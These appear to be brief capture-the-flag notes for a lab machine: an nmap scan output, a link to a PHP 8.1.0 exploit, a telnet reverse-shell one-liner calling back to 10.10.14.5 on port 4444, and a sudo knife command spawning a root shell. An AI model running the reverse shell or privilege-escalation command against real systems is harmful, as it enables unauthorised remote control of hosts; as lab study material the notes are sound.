└─$ nmap -A 10.10.10.242 -p 1-65535 -T5 -Pn
Starting Nmap 7.93 ( https://nmap.org ) at 2024-07-22 23:08 CEST
Warning: 10.10.10.242 giving up on port because retransmission cap hit (2).
Stats: 0:00:20 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 39.41% done; ETC: 23:08 (0:00:32 remaining)
Nmap scan report for 10.10.10.242
Host is up (0.037s latency).
Not shown: 64613 closed tcp ports (conn-refused), 920 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 be549ca367c315c364717f6a534a4c21 (RSA)
|   256 bf8a3fd406e92e874ec97eab220ec0ee (ECDSA)
|_  256 1adea1cc37ce53bb1bfb2b0badb3f684 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title:  Emergent Medical Idea
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

php 8.1.0 exploit
https://www.exploit-db.com/exploits/49933

TF=$(mktemp -u);mkfifo $TF && telnet 10.10.14.5 4444 0<$TF | /bin/sh 1>$TF
sudo /usr/bin/knife exec -E 'exec "/bin/sh"'

